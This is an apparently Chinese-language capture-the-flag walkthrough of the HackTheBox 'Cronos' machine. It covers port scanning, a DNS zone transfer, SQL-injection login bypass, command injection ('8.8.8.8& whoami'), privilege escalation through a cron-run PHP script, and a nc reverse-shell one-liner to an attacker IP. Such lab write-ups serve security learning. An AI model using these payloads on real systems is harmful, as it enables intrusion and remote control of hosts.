0x00 信息收集
nmap -Pn -sV -A -T 4 10.10.10.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
首先查看80端口的服务
尝试爆破路径,未发现任何可利用的地方
因为开启了53端口的DNS服务,且IP访问的是默认页面,因此将cronos.htb添加到host
vi /etc/hosts
因为扫描端口中有53 DNS服务的端口很可疑,因此考虑dns域传送的问题。
可以得到几个子域名,admin比较感兴趣,同样加到hosts
是一个后台登录,利用方式常见的有爆破和sql注入等
尝试sql注入
顺利进入后台,并且可以看到可以执行系统命令
8.8.8.8& whoami
0x01 漏洞利用
尝试利用命令执行来反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4444 >/tmp/f
获得交互式shell
python -c ‘import pty;pty.spawn(“/bin/sh”)’
0x02 权限提升
使用sudo -l需要www-data的密码,因此想办法上#传LinEnum.sh
通过wget下载kali中的脚本,通过脚本可以看到crontab定时有许多东西,因此查看一下定时任务
查看php的定时执行
写入php的shell
得到shell